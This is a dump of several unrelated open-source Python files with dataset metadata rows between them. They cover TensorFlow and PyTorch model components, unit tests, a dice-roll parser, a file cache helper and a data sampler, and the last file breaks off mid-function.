#%% test kernel evaluation with single lengthscale
lengthsc = 2
# pytorched
K_instance = RBF(length_scale=lengthsc, multil=False, device=DEVICE) ##instance of kernel object - non-evaluated
if DEVICE=='cpu':
Ktorch = K_instance.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).detach().numpy()
else:
Ktorch = K_instance.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=False).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=False).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
#%% test kernel evaluation with multiple lengthscales
lengthsc = np.array([1,2])
# pytorched
if DEVICE=='cpu':
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).detach().numpy()
else:
K_instance2 = RBF(length_scale=lengthsc, multil=True, device=DEVICE) ##instance of kernel object - non-evaluated
Ktorch = K_instance2.Kernel(X, Z).cpu().detach().numpy()
gradK_torch = K_instance2.gradient_X(X, Z).cpu().detach().numpy()
# numpyed
if DEVICE=='cpu':
K_numpy = Knp(X.detach().numpy(), Z.detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.detach().numpy(), Z.detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
else:
K_numpy = Knp(X.cpu().detach().numpy(), Z.cpu().detach().numpy(),l=lengthsc, multil=True).astype(np.float32)
grad_K_numpy = grdx_K_all(X.cpu().detach().numpy(), Z.cpu().detach().numpy(), l=lengthsc, multil=True).astype(np.float32)
np.testing.assert_allclose(Ktorch, K_numpy, rtol=1e-06)
np.testing.assert_allclose(gradK_torch, grad_K_numpy, rtol=1e-06)
| 37.683453 | 180 | 0.612447 | 5,834 | 0.556892 | 0 | 0 | 0 | 0 | 0 | 0 | 4,112 | 0.392516 |
f1f6905a9916f479816181eeb443cb6b650cc61b
| 11,075 |
py
|
Python
|
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
components.py
|
zachgk/tfcomponents
|
6c33349ab13549debfc9b347df795c82e38cfa73
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import tensorflow as tf
import tflearn
from tflearn import variables as vs
from tflearn import activations
from tflearn import initializations
from tflearn import losses
from tflearn import utils
def condition(cond, t, f):
if cond is True:
return t
elif cond is False:
return f
else:
return tf.cond(cond, lambda: t, lambda: f)
class objectview(object):
def __init__(self, d):
self.__dict__.update(d)
componentInherit = {
'globalDroppath': False,
'localDroppath': False,
'localDroppathProb': .5,
'parentType': '',
'currentType': ''
}
class TFComponent:
def __getitem__(self, incoming):
global componentInherit
inheritBak = componentInherit.copy()
if 'localDroppath' in self.opts:
componentInherit['localDroppath'] = self.opts['localDroppath']
if 'globalDroppath' in self.opts:
componentInherit['globalDroppath'] = self.opts['globalDroppath']
componentInherit['parentType'] = componentInherit['currentType']
componentInherit['currentType'] = type(self).__name__
opts = objectview(self.opts)
if isinstance(incoming, TFComponentVal) and (not hasattr(self, 'noDirect')):
incoming = incoming.resolve()
net = self.get(incoming, opts, componentInherit)
if isinstance(net, TFComponentVal) and componentInherit['parentType'] is '':
net = net.resolve()
componentInherit = inheritBak
return net
class TFComponentVal:
pass
class Identity(TFComponent):
def __init__(self, **kwargs):
self.noDirect = True
self.opts = {
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
return incoming
class Sequence(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Sequence"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for blk in self.blocks:
resnet = blk[resnet]
return resnet
class ParallelVal(TFComponentVal):
def __init__(self, opts, inherit, scope):
self.blocks = list()
self.opts = opts
self.inherit = inherit
self.scope = scope
def resolve(self):
opts = self.opts
inherit = self.inherit
with tf.name_scope(self.scope):
is_training = tflearn.get_training_mode()
blocks = tf.pack(self.blocks)
basic = tf.reduce_sum(blocks, 0)
oneChoice = tf.random_uniform([], maxval=len(self.blocks), dtype='int32')
one = tf.cond(is_training, lambda: tf.gather(blocks,oneChoice), lambda: basic)
someChoice = tf.less(tf.random_uniform([len(self.blocks)]), inherit['localDroppathProb'])
some = tf.cond(is_training, lambda: tf.reduce_sum(tf.boolean_mask(blocks,someChoice), 0), lambda: basic)
some = tf.cond(tf.reduce_any(someChoice), lambda: some, lambda: one)
resnet = condition(inherit['globalDroppath'], one, condition(inherit['localDroppath'], some, basic))
return resnet
class Parallel(TFComponent):
def __init__(self, blocks, **kwargs):
self.noDirect = True
self.blocks = blocks
self.opts = {
'name': "Parallel"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name) as scope:
blocksMixed = [blk[resnet] for blk in self.blocks]
blocks = ParallelVal(opts, inherit, scope)
for blk in blocksMixed:
if isinstance(blk, ParallelVal):
blocks.blocks = blocks.blocks + blk.blocks
else:
blocks.blocks.append(blk)
return blocks
class Chain(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Chain"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
for i in range(self.size):
resnet = self.block[resnet]
return resnet
class Fractal(TFComponent):
def __init__(self, size, block, **kwargs):
self.noDirect = True
self.size = size
self.block = block
self.opts = {
'name': "Fractal"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
if self.size <= 1:
return self.block[resnet]
else:
sub = Fractal(self.size-1, self.block)
resnet = Parallel([self.block, Chain(2, sub)])[resnet]
return resnet
class Residual(TFComponent):
def __init__(self, block, **kwargs):
self.noDirect = True
self.block = block
self.opts = {
'name': "Residual"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
with tf.name_scope(opts.name):
resnet = Parallel([Identity(), self.block])
return resnet
class Conv2d(TFComponent):
def __init__(self, nb_filter, filter_size, **kwargs):
self.nb_filter = nb_filter
self.filter_size = filter_size
self.opts = {
'strides': 1,
'padding': 'same',
'activation': 'linear',
'bias': True,
'weights_init': 'uniform_scaling',
'bias_init': 'zeros',
'regularizer': None,
'weight_decay': 0.001,
'trainable': True,
'restore': True,
'name': "Conv2D"
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
assert opts.padding in ['same', 'valid', 'SAME', 'VALID'], \
"Padding must be same' or 'valid'"
input_shape = utils.get_incoming_shape(incoming)
assert len(input_shape) == 4, "Incoming Tensor shape must be 4-D"
filter_size = utils.autoformat_filter_conv2d(self.filter_size,
input_shape[-1],
self.nb_filter)
strides = utils.autoformat_kernel_2d(opts.strides)
padding = utils.autoformat_padding(opts.padding)
with tf.name_scope(opts.name) as scope:
W_init = opts.weights_init
if isinstance(opts.weights_init, str):
W_init = initializations.get(opts.weights_init)()
W_regul = None
if opts.regularizer:
W_regul = lambda x: losses.get(opts.regularizer)(x, opts.weight_decay)
W = vs.variable(scope + 'W', shape=filter_size,
regularizer=W_regul, initializer=W_init,
trainable=opts.trainable, restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, W)
b = None
if opts.bias:
b_init = initializations.get(opts.bias_init)()
b = vs.variable(scope + 'b', shape=self.nb_filter,
initializer=b_init, trainable=opts.trainable,
restore=opts.restore)
# Track per layer variables
tf.add_to_collection(tf.GraphKeys.LAYER_VARIABLES + '/' + scope, b)
inference = tf.nn.conv2d(incoming, W, strides, padding)
if b: inference = tf.nn.bias_add(inference, b)
if isinstance(opts.activation, str):
inference = activations.get(opts.activation)(inference)
elif hasattr(activation, '__call__'):
inference = activation(inference)
else:
raise ValueError("Invalid Activation.")
# Track activations.
tf.add_to_collection(tf.GraphKeys.ACTIVATIONS, inference)
# Add attributes to Tensor to easy access weights.
inference.scope = scope
inference.W = W
inference.b = b
return inference
class ShallowResidualBlock(TFComponent):
def __init__(self, out_channels, **kwargs):
self.out_channels = out_channels
self.opts = {
'downsample': False,
'downsample_strides': 2,
'activation': 'relu',
'batch_norm': True,
'bias': True,
'weights_init': 'variance_scaling',
'bias_init': 'zeros',
'regularizer': 'L2',
'weight_decay': 0.0001,
'trainable': True,
'restore': True,
'name': 'ResidualBlock'
}
self.opts.update(kwargs)
def get(self, incoming, opts, inherit):
resnet = incoming
in_channels = incoming.get_shape().as_list()[-1]
with tf.name_scope(opts.name):
identity = resnet
if not downsample:
opts.downsample_strides = 1
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3,
opts.downsample_strides, 'same', 'linear',
opts.bias, opts.weights_init, opts.bias_init,
opts.regularizer, opts.weight_decay, opts.trainable,
opts.restore)
if opts.batch_norm:
resnet = tflearn.batch_normalization(resnet)
resnet = tflearn.activation(resnet, opts.activation)
resnet = conv_2d(resnet, self.out_channels, 3, 1, 'same',
'linear', opts.bias, opts.weights_init,
opts.bias_init, opts.regularizer, opts.weight_decay,
opts.trainable, opts.restore)
# Downsampling
if opts.downsample_strides > 1:
identity = tflearn.avg_pool_2d(identity, 1,
opts.downsample_strides)
# Projection to new dimension
if in_channels != self.out_channels:
ch = (self.out_channels - in_channels)//2
identity = tf.pad(identity,
[[0, 0], [0, 0], [0, 0], [ch, ch]])
in_channels = self.out_channels
#resnet = resnet + identity
return resnet
| 34.182099 | 116 | 0.557562 | 10,433 | 0.942032 | 0 | 0 | 0 | 0 | 0 | 0 | 1,100 | 0.099323 |
f1f9c0eee8a8c52481a3d1792850e6310a0a8163
| 1,984 |
py
|
Python
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 421 |
2015-06-02T16:29:59.000Z
|
2021-06-03T18:44:42.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 404 |
2015-06-02T20:23:42.000Z
|
2019-08-21T16:59:41.000Z
|
tests/unit/warnings_test.py
|
gamechanger/dusty
|
dd9778e3a4f0c623209e53e98aa9dc1fe76fc309
|
[
"MIT"
] | 16 |
2015-06-16T17:21:02.000Z
|
2020-03-27T02:27:09.000Z
|
from ..testcases import DustyTestCase
from dusty.warnings import Warnings
class TestWarnings(DustyTestCase):
def setUp(self):
super(TestWarnings, self).setUp()
self.warnings = Warnings()
def test_warn(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Yo this thing is also wrong'
self.warnings.warn('test', message_1)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1]})
self.warnings.warn('test', message_2)
self.assertItemsEqual(self.warnings._stored, {'test': [message_1, message_2]})
def test_has_warnings(self):
self.assertFalse(self.warnings.has_warnings)
self.warnings.warn('test', 'yo')
self.assertTrue(self.warnings.has_warnings)
def test_pretty_with_no_warnings(self):
self.assertEqual(self.warnings.pretty(), "")
def test_pretty(self):
message_1 = 'Something is wrong, yo'
message_2 = 'Something is very wrong, and that something takes way more than 80 characters to communicate the fact that it is wrong'
self.warnings.warn('test', message_1)
self.warnings.warn('test', message_2)
self.assertEqual(self.warnings.pretty(), "WARNING (test): Something is wrong, yo\nWARNING (test): Something is very wrong, and that something takes way more than 80 characters to\ncommunicate the fact that it is wrong\n")
def test_clear_namespace(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('test')
self.assertEqual(len(self.warnings._stored['test']), 0)
def test_clear_namespace_leaves_others_unaffected(self):
self.warnings.warn('test', 'Something is wrong, yo')
self.assertEqual(len(self.warnings._stored['test']), 1)
self.warnings.clear_namespace('some-other-namespace')
self.assertEqual(len(self.warnings._stored['test']), 1)
| 45.090909 | 229 | 0.689516 | 1,907 | 0.96119 | 0 | 0 | 0 | 0 | 0 | 0 | 536 | 0.270161 |
f1fa3f6469623ef44f7b253d9c5da8307b330081
| 4,655 |
py
|
Python
|
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
dndice.py
|
Ar4093/PythonUtils
|
fd2d1e0eab51c40cd75b42a513f6e76ea8f76bb3
|
[
"MIT"
] | null | null | null |
from random import randint
import re
# Supported formats:
# [A]dX[(L|H|K)n][.Y1[.Y2[...]]]
# A - number of dice
# X - number of sides of dice
# . - operation: allowed are + - * x /
# Ln/Hn/Kn - discard the Lowest n dice or Keep the Highest n dice. - will only apply the first of these, in order LHK
# Y1,Y2,... - operand
# warning: doesn't respect order of operations. So +5*3 will first add 5, then multiply by 3.
# example: 4d6+3 rolls 4 dice with 6 faces each, afterwards adds 3.
# Thanks to tara, maximum number of allowed dice/faces is 999.
# Parse a single dice roll
def randomDice(dice):
try:
# Format for the whole roll
diceexp = re.compile('(?:\D+)?(\d{0,3})d(\d{1,3})((([\+\-\*x\/LH])(\d+))+)?',re.IGNORECASE)
# Format for modifiers
addsexp = re.compile('[\+\-\*x\/LH]\d+',re.IGNORECASE)
numexp = re.compile('(\d+)')
m = diceexp.match(dice)
# Result of rolls
result = 0
rolls = []
# Weird input?
if not m:
return 0
# Get the number of dice to roll
dicenum = 0
if m.group(1) == "" or m.group(1) == None:
dicenum = 1
else:
dicenum = int(m.group(1))
# Get the number of faces on each dice
facenum = int(m.group(2))
# Roll the dice
for i in range(dicenum):
rolls.append(randint(1,facenum))
# result += randint(1,facenum)
# sort the rolls for further processing
rolls.sort()
if 'l' in dice.lower():
index = dice.lower().find('l') + 1
number = int(numexp.match(dice[index:]).group())
# Can't drop more dice than available, drop all of them
if number > dicenum:
return 0
for i in range(number,len(rolls)):
result += rolls[i]
elif 'h' in dice.lower():
index = dice.lower().find('h') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
elif 'k' in dice.lower():
index = dice.lower().find('k') + 1
number = int(numexp.match(dice[index:]).group())
# Can't keep more dice than available, keeping all of them
if number > dicenum:
number = dicenum
for i in range(len(rolls)-number,len(rolls)):
result += rolls[i]
else:
for i in range(len(rolls)):
result += rolls[i]
# Any modifiers present?
if not m.group(3) == None:
# Split them up
n = addsexp.findall(m.group(3))
# Modifiers
for i in range(len(n)):
# Value of modifier
modval = int(n[i][1:])
# Type of modifier
if n[i][0] == '+':
result += modval
elif n[i][0] == '-':
result -= modval
elif n[i][0] in '*x':
result *= modval
elif n[i][0] == '/':
result /= modval
return result
except:
return None
# Parse a whole expression.
#
# Format: dice1[+dice2[+dice3[...]]]
# dice1, dice2, dice3, ...: Any valid dice format as written in the randomDice function.
#
# Returns: The total of all rolls as integer, None if there was no valid dice notation found
def dnDice(dice):
# Pattern
diceexp1 = re.compile('(\d{0,3}d\d{1,3})(([\+\-\*x\/HLK]\d+(?!d))+)?', re.IGNORECASE)
# Total roll
total = 0
results = diceexp1.findall(dice)
if len(results) == 0:
return None
else:
# Total up the rolls
for d in results:
string = ""
# Discard the last part of the matched expression, it's a weird duplicate, join the rest together (the modifiers get split off)
for part in dice:
string += part
t = randomDice(string)
if t == None:
return None
else:
try:
total += randomDice(string)
except:
return None
return total
| 34.738806 | 140 | 0.478195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,631 | 0.350376 |
f1fbbda465699c148d64aca8b6b9736f618761e2
| 2,471 |
py
|
Python
|
cfg/configure_model.py
|
dadelani/sentiment-discovery
|
0cbfc5f6345dacbf52f1f806a9e136a61ca35cf8
|
[
"BSD-3-Clause"
] | 2 |
2019-04-24T08:23:54.000Z
|
2020-06-24T10:25:34.000Z
|
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | null | null | null |
cfg/configure_model.py
|
mikekestemont/sentiment-discovery
|
84bf39846ddf6b099d99318214a013269b5b0e61
|
[
"BSD-3-Clause"
] | 1 |
2019-03-23T08:07:33.000Z
|
2019-03-23T08:07:33.000Z
|
import os
from sentiment_discovery.reparameterization import remove_weight_norm
from sentiment_discovery.model import make_model
class ModuleConfig(object):
def __init__(self, parser):
super(ModuleConfig, self).__init__()
self.parser = parser
def apply(self, cfg, opt):
"""make model and format model path for reloading parameters"""
print('configuring model')
cell_type = opt.rnn_type
num_layers = opt.layers
embed_size = opt.embed_size
hidden_size = opt.rnn_size
# set in configure_data
data_size = opt.data_size
dropout = opt.dropout
w_norm = opt.weight_norm
lstm_only = opt.lstm_only
saved_path = ''
if opt.load_model != '':
model_dir = cfg.logger.get_log_dir(opt.model_dir)
saved_path = os.path.join(model_dir, opt.load_model)
print(embed_size)
model, recurrent_module, embedder_module, chkpt = make_model(
cell_type=cell_type, num_layers=num_layers,
embed_size=embed_size, hidden_size=hidden_size,
data_size=data_size, dropout=dropout, weight_norm=w_norm,
lstm_only=lstm_only, saved_path=saved_path)
cfg.model = model
cfg.chkpt = chkpt
nParams = sum([p.nelement() for p in cfg.model.parameters()])
print('* number of parameters: %d' % nParams)
def configure_model(parser):
"""add cmdline args for configuring models"""
parser.add_argument('-load_model', default='',
help="""a specific checkpoint file to load from experiment's model directory""")
parser.add_argument('-should_test', action='store_true',
help='whether to train or evaluate a model')
parser.add_argument('-model_dir', default='model',
help='directory where models are saved to/loaded from')
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the rnn')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=64,
help='Size of embeddings')
parser.add_argument('-weight_norm', action='store_true',
help='whether to use weight normalization for training NNs')
parser.add_argument('-lstm_only', action='store_true',
help='if `-weight_norm` is applied to the model, apply it to the lstm parmeters only')
parser.add_argument('-dropout', type=float, default=0.1,
help='Dropout probability.')
return ModuleConfig(parser)
| 39.854839 | 93 | 0.718737 | 1,115 | 0.451234 | 0 | 0 | 0 | 0 | 0 | 0 | 763 | 0.308782 |
f1fcac439aa33bb2b7ada9c60628d61b4b1afd6c
| 4,309 |
py
|
Python
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 10 |
2019-01-19T13:09:37.000Z
|
2021-06-18T13:40:10.000Z
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 681 |
2019-01-22T18:12:23.000Z
|
2022-03-25T14:14:31.000Z
|
tests/backends/console/test_env.py
|
j5api/j5
|
d3158cfd3d0d19ed33aba0c5c2c1f17a38fe12c7
|
[
"MIT"
] | 8 |
2019-02-22T21:45:47.000Z
|
2021-11-17T19:43:33.000Z
|
"""Tests for the ConsoleEnvironment and Console helper."""
from j5.backends.console import Console
def test_console_instantiation() -> None:
"""Test that we can create a console."""
console = Console("MockConsole")
assert type(console) is Console
assert console._descriptor == "MockConsole"
def test_console_info() -> None:
"""Test that the console can output information."""
class MockPrintConsole(Console):
"""Define a testing print function."""
def _print(self, text: str) -> None:
"""Mock printing function."""
assert text == "TestBoard: Test the console info"
console = MockPrintConsole("TestBoard")
console.info("Test the console info")
def test_console_read() -> None:
"""Test that we can read from the console."""
class MockInputConsole(Console):
"""Define a testing input function."""
def _input(self, prompt: str) -> str:
"""Mock some input."""
return str(reversed(prompt))
console = MockInputConsole("TestBoard")
assert str(console.read("Enter Test Input")) == str(reversed("Enter Test Input"))
def test_console_read_none_type() -> None:
"""Test that we can read None from console, i.e any input."""
class ConsoleNone(Console):
"""Define a testing input function."""
def _input(self, prompt: str) -> str:
"""Mock some input."""
return "string"
console = ConsoleNone("TestBoard")
assert console.read("Enter test input", None) is None
def test_console_read_bad_type() -> None:
"""Test that the console emits an error if it cannot cast to the desired type."""
class MockConsoleWithState(Console):
"""A mock console with state."""
def __init__(self, descriptor: str) -> None:
super().__init__(descriptor)
self.bad_attempt_count = 0
def _input(self, prompt: str) -> str: # noqa: A003
"""Mock some input."""
if self.bad_attempt_count == 0:
self.bad_attempt_count += 1
return "Not an int"
return "6"
def _print(self, text: str) -> None: # noqa: A003,T002
"""Mock printing function."""
if self.bad_attempt_count == 0:
assert text == "TestConsole: Unable to construct a int from 'Not an int'"
console = MockConsoleWithState("TestConsole")
assert console.read("I want an int", int) == 6
def test_console_handle_boolean_correctly() -> None:
"""Test that the console handles bools correctly."""
class MockConsoleBoolean(Console):
"""A mock console with state."""
true_cases = ["yes", "YES", "YeS", "True"]
false_cases = ["no", "NO", "No", "False"]
extra_cases = ["bees", "foo", "0", "True"]
def __init__(self, descriptor: str) -> None:
super().__init__(descriptor)
self._pos = 0
self.cases = self.true_cases + self.false_cases + self.extra_cases
def _input(self, prompt: str) -> str: # noqa: A003
"""Mock some input."""
val = self.cases[self._pos]
self._pos += 1
return val
def _print(self, text: str) -> None: # noqa: A003,T002
"""Mock printing function."""
if self._pos in [8, 9, 10, 11]:
assert text == f"TestConsole: Unable to construct a bool " \
f"from '{self.cases[self._pos - 1]}'"
else:
raise AssertionError()
@property
def is_finished(self) -> bool:
"""Check if all of the cases have been consumed."""
return self._pos == len(self.cases)
console = MockConsoleBoolean("TestConsole")
for _ in MockConsoleBoolean.true_cases:
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert val
for _ in MockConsoleBoolean.false_cases:
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert not val
# Test if false inputs are skipped.
val = console.read("I want an bool", bool, check_stdin=False)
assert isinstance(val, bool)
assert val
assert console.is_finished
| 31.918519 | 89 | 0.598283 | 2,437 | 0.56556 | 0 | 0 | 160 | 0.037132 | 0 | 0 | 1,365 | 0.316779 |
f1ff198ad462185fb2910c252e87000aebf824f5
| 6,351 |
py
|
Python
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | 2 |
2021-01-11T20:09:32.000Z
|
2021-05-14T14:52:48.000Z
|
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
backend/modules/cache.py
|
fheyen/ClaVis
|
528ca85dd05606d39761b5a00d755500cf1cd2f6
|
[
"MIT"
] | null | null | null |
from os import listdir, remove, makedirs
from os.path import isfile, join, exists
import shutil
import joblib
from termcolor import cprint
import json
from pathlib import Path
_cache_path = None
_log_actions = True
def init(cache_path, log_actions=True):
"""
Initializes the cache.
Keyword Arguments:
- cache_path: directory where cached files are saved
- log_actions: when true, all actions are logged
"""
global _cache_path, _log_actions
_log_actions = log_actions
_cache_path = cache_path
try:
if not exists(cache_path):
makedirs(cache_path)
except Exception as e:
cprint(e, 'red')
def write(filename, data):
"""
Pickles a file and writes it to the cache.
Keyword Arguments:
- filename: name of the file to write to
- data: object to cache
"""
if _log_actions:
cprint('Writing to cache: "{}"'.format(filename), 'green')
joblib.dump(data, join(_cache_path, filename))
def write_plain(filename, data, add_extension=True):
"""
Simply writes the textual data to a file.
"""
if _log_actions:
cprint('Writing to cache (plain): "{}"'.format(filename), 'green')
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(data)
def write_dict_json(filename, data, add_extension=True):
"""
Writes a dictionary to file using JSON format.
"""
if _log_actions:
cprint('Writing to cache (json): "{}"'.format(filename), 'green')
json_string = json.dumps(data, sort_keys=False, indent=4)
if add_extension:
filename += '.json'
with open(join(_cache_path, filename), 'w') as f:
f.write(json_string)
def read(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return joblib.load(join(_cache_path, filename))
def read_multiple(filenames):
"""
Reads multiple file from the cache and unpickles them.
Keyword Arguments:
- filenames: names of the files to read
Returns:
- result: unpickled object
- success_files: list of successful filenames
- errors: filenames for which exceptions happened
"""
result = []
success_files = []
errors = []
for f in filenames:
try:
result.append(read(f))
success_files.append(f)
except Exception as e:
cprint(f'Loading {f} failed!', 'red')
cprint(e, 'red')
errors.append(f)
return result, success_files, errors
def read_plain(filename):
"""
Reads a file from the cache and unpickles it.
Keyword Arguments:
- filename: name of the file to read
Returns:
- data: unpickled object
"""
if _log_actions:
cprint('Loading from cache: "{}"'.format(filename), 'green')
return Path(join(_cache_path, filename)).read_text()
def delete(filename):
"""
Removes all files from the cache that have names starting with filename.
"""
deleted = 0
errors = 0
for f in entries():
try:
if f.startswith(filename):
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {filename}', 'red')
errors += 1
cprint(f'Removed from cache all files starting with {filename}', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def delete_all_clf_projs():
"""
Deletes all classifier projections
"""
deleted = 0
errors = 0
for f in entries():
try:
if '__clf_proj_' in f:
remove(join(_cache_path, f))
deleted += 1
except:
cprint(f'Cannot remove from cache: {f}', 'red')
errors += 1
cprint(f'Removed from cache all classifier projections', 'green')
msg = f'Removed {deleted} files, {errors} errors'
cprint(msg, 'yellow')
return {
'type': 'success' if errors == 0 else 'error',
'msg': msg
}
def clear():
"""
Deletes the cache.
"""
cprint('Clearing cache', 'yellow')
shutil.rmtree(_cache_path, ignore_errors=True)
def entries():
"""
Lists all files in the cache.
Returns:
- list of all file names in the cache directory
"""
return [f for f in listdir(_cache_path) if isfile(join(_cache_path, f))]
def content():
"""
Returns all .json files in the cache to allow showing what
classifiers etc. have been trained so far.
Returns:
- a dictionary containing all files' contents
"""
cached_files = entries()
json_files = [f for f in cached_files if f.endswith('_args.json')]
datasets = []
classifiers = []
projections = []
classifier_projections = []
for f in json_files:
try:
filepath = join(_cache_path, f)
contents = Path(filepath).read_text()
json_dict = {
'file': f,
'args': json.loads(contents)
}
if '__proj_' in f:
projections.append(json_dict)
elif '__clf_proj_' in f:
classifier_projections.append(json_dict)
elif '__clf_' in f:
# send scores for cached classifications
score_file = f.replace('_args.json', '_scores.json')
scores = Path(join(_cache_path, score_file)).read_text()
json_dict['scores'] = json.loads(scores)
classifiers.append(json_dict)
elif f.startswith('data_'):
datasets.append(json_dict)
except Exception as e:
cprint(
f'Error: Some related files may be missing for file {f}, check if you copied files correctly or run you jobs again!', 'red')
cprint(e, 'red')
return {
'datasets': datasets,
'classifiers': classifiers,
'projections': projections,
'classifier_projections': classifier_projections
}
| 26.352697 | 140 | 0.597859 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2,483 | 0.390962 |
7b00a8aae5f5c462bd8742df1743968940cbb675
| 8,123 |
py
|
Python
|
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | null | null | null |
training/data/sampler.py
|
jpjuvo/PANDA-challenge-raehmae
|
5748cd23f18e2dd36d56918dcee495b822d2a5cd
|
[
"MIT"
] | 1 |
2021-04-20T04:37:47.000Z
|
2021-04-20T04:37:47.000Z
|
import torch
import os
import numpy as np
import random
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from data.tileimages import *
from data.multitask import *
import fastai
from fastai.vision import *
class FoldSampler:
def __init__(self, TRAIN, LABELS,
mean, std, N,
tfms=[], sz=128,bs=16,
n_folds=4, uniform_augmentations=False,
shuffle_nonempty_imgs=False,
model_name=None,
is_train=True,
is_ordinal=False,
SEED=2020,
num_workers=4):
self._seed_everything(SEED)
self.SEED = SEED
self.tfms = tfms
self.mean = mean
self.std = std
self.N = N
self.nfolds = n_folds
self.TRAIN = TRAIN
self.sz = sz
self.bs = bs
self.is_ordinal = is_ordinal
self.is_train=is_train
self.num_workers=num_workers
self.model_name = model_name
self.uniform_augmentations = uniform_augmentations
self.shuffle_nonempty_imgs = shuffle_nonempty_imgs
self._prepare_data(TRAIN, LABELS)
self.df.head()
def _seed_everything(self, seed):
random.seed(seed)
os.environ['PYTHONHASHSEED'] = str(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed(seed)
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = True
def _cats4slide(self, image_id):
